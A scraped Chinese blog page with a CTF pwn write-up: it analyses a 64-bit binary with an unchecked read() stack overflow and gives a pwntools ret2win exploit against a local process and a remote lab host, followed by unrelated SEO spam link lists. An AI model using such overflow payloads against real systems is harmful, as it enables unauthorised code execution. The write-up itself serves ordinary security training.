当前位置: 首页 > wzjs >正文

枣庄建网站广告公司名字

枣庄建网站,广告公司名字,专做农产品跨境的网站有,织梦本地做网站用file分析是64位的程序 检查保护发现都是关闭的 用IDA分析,可以看到read()函数就是问题点 IDA分析时常出现的问题点: gets(buf)、strcpy(dest,sec)、scanf("%s",buf)、stract(buf,buf2)、read(0,buf,size…

用file分析是64位的程序

检查保护发现都是关闭的

用IDA分析,可以看到read()函数就是问题点

IDA分析时常出现的问题点:

gets(buf)、strcpy(dest,sec)、scanf("%s",buf)、stract(buf,buf2)、read(0,buf,size)

可以看到申请了一个48字节长度的遍历s

但是read却读取了0x100(256)字节,明显的栈溢出

从IDA分析可以看到距离rbp长度是30

也找到了后门函数

因此得到后门地址

0x400751

exp如下


from pwn import *io = process("./pwn2")get_shell_addr = 0x400751payload = b"A"*(0x30+0x8)+p64(get_shell_addr)    # 因为是64位的程序,ebp长度为8,同时后门地址要用p64转换io.sendline(payload)
io.interactive()

那么打靶场的地址获取flag

from pwn import *io = remote("117.72.52.127","11758")get_shell_addr = 0x400751payload = b"A"*(0x30+0x8)+p64(get_shell_addr)io.sendline(payload)
io.interactive()

http://www.dtcms.com/wzjs/34672.html

相关文章:

  • 政务网站模版新手seo入门教程
  • wordpress 企业网站主题口碑好的设计培训机构
  • 青岛关键词排名推广新河seo怎么做整站排名
  • 深圳外贸建站与推广关键词查找的方法有以下几种
  • 互联网b2b采购平台百度seo一本通
  • 苹果电脑如何做网站互联网广告联盟
  • 重庆网站设计重庆最加科技河源今日头条新闻最新
  • 元隆盛建设集团有限公司网站关键词怎么写
  • 海外网站太慢网络广告营销有哪些
  • 公司注册网站源码网店运营是做什么的
  • 如何用txt做网站时增加照片如何推广平台
  • c 做的比较牛逼的网站叫什么windows优化大师值得买吗
  • 萧县做网站信阳seo公司
  • 网站建设具体需求北京seo软件
  • qq网站直接登录百度关键词刷排名教程
  • php网站下载文件怎么做网站优化排名公司哪家好
  • 广东网站建设网站必应搜索推广
  • 织梦怎么制作手机网站源码百度指数明星搜索排名
  • 做区块链好的网站深圳网站优化平台
  • 徐州网站开发口碑好手机如何制作网页
  • 烟台做网站公司推广引流
  • 连网站建设搜索引擎优化的分类
  • asp.net做织梦网站seo和sem是什么意思
  • 企业网站怎么做百度长沙正规seo优化公司
  • 沈阳模板建站服务热线公司软文
  • 网上商城网站建设公司百度小程序排名优化
  • 淄博网站建设选哪家长春疫情最新情况
  • 江门模板建站定制免费seo公司
  • 网站运营做产品需要哪些知识太原网站建设
  • 辽宁建设工程质量监督站网站网络推广方案范文